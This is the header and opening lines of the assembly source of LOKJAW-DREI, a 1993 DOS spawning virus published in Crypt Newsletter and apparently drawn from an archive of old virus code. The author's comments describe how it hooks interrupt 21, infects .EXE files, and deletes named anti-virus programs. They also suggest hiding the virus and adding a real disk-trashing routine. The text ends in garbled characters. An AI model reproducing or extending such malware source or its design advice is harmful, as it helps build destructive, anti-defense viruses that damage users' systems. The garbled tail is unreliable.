lokjawd.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;LOKJAW-DREI: an .EXE-infecting spawning virus with retaliatory 
;anti-anti-virus capability.  For Crypt Newsletter 12, Feb. 1993.               
;
;LOKJAW-DREI is a resident spawning virus which installs itself in
;memory using the same engine as the original Civil War/Proto-T virus.
;It is simpler in that none of its addresses have to be 
;relative, an indirect benefit of the fact that the virus has no 
;"appending" quality.  That means, LOKJAW doesn't alter its "host" files,
;just like a number of other companion/spawning viruses published in
;previous newsletters.
;
;LOKJAW hooks interrupt 21 and infects .EXE files on execution, creating 
;itself as companion .COMfile to the "host."  Due to the inherent rules
;of DOS, this ensures the virus will be executed before the "host" the
;next time the infected program is used.  In reality, LOKJAW is even
;simpler than that.  If not in memory, the first time the host is
;called, LOKJAW will go resident and not even bother to load it.
;In most cases, the user will assume a slight error and call the host
;again, at which point it will function normally. LOKJAW will then infect
;every subsequent .EXE file called. LOKJAW is very transparent in operation,
;except when certain anti-virus programs (Integrity Master, McAfee's SCAN &
;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded.
;
;LOKJAW's "stinger" code demonstrates the simplicity of creating a strongly
;retaliating virus by quickly deleting the anti-virus program before it
;can execute and then displaying a "chomping" graphic.  Even if the anti-
;virus program cannot detect LOKJAW in memory, it will be deleted.  This
;makes it essential that the user know how to either remove the virus from
;memory before beginning anti-virus measures, or at the least run the
;anti-virus component from a write-protected disk. At a time when retail
;anti-virus packages are becoming more complicated - and more likely that the
;average user will run them from default installations on his hard file -
;LOKJAW's retaliating power makes it a potentially very annoying pest.
;A virus-programmer serious about inconveniencing a system could do a
;number of things with this basic idea. They are;
; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus
; instantly.
; 2. Alter the_stinger routine, so that the virus immediately attacks the
; hard file.  The implementation is demonstrated by LOKJAW-DREI, which
; merely makes the disk inaccessible until a warm reboot if an anti-virus
; program is employed against it.  By placing
; a BONA FIDE disk-trashing routine here, it becomes very hazardous for
; an unknowing user to employ anti-virus measures on a machine where
; LOKJAW or a LOKJAW-like program is memory resident. While LOCKAW and
; LOKJAW-ZWEI will produce write-protect errors if an anti-virus program
; is run against them from a write-protected diskette, LOKJAW-DREI
; won't.  It will recognize the anti-virus program, display the "chomp"
; and mimic trashing the hard file. This effect makes the disk inacessible
; until the machine is rebooted.
;
;The anti-anti-virus strategies are becoming more common in viral programming.                 
;Mark Ludwig programmed the features of a direct-action retaliating
;virus in his "Computer Virus Developments Quarterly."  Peach, Groove and
;Encroacher viruses attack anti-virus software by deletion of key files. 
;And in this issue, the Sandra virus employs a number 
;of anti-anti-virus features. 
;
;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and                
;DREI infected files from a system, simply delete the "companion" .COM 
;duplicates of your executables.  Ensure that the machine has been booted
;from a clean disk.  To remove the LOKJAW .COM-appending virus, at this
;time it will be necessary for you to restore the contaminated files from
;a clean back-up.
;
;Alert readers will notice the LOKJAW-ZWEI and DREI create their "companion"
;files in plain sight.  Generally, spawning viruses make themselves
;hidden-read-only-system files.  This is an easy hack and the code is supplied
;in earlier issues of the newsletter.  The modification is left to 
;the reader as an academic exercise.

		
		.radix 16
     cseg       segment
		model  small
		assume cs:cseg, ds:cseg, es:cseg

		org 100h

oi21            equ endit
filelength      equ endit - begin
nameptr         equ endit+4
DTA             equ endit+8

	 




begin:          jmp     virus_install                              

note:            
		db     '[l檱k鮿W-d鈵峕.釢.歳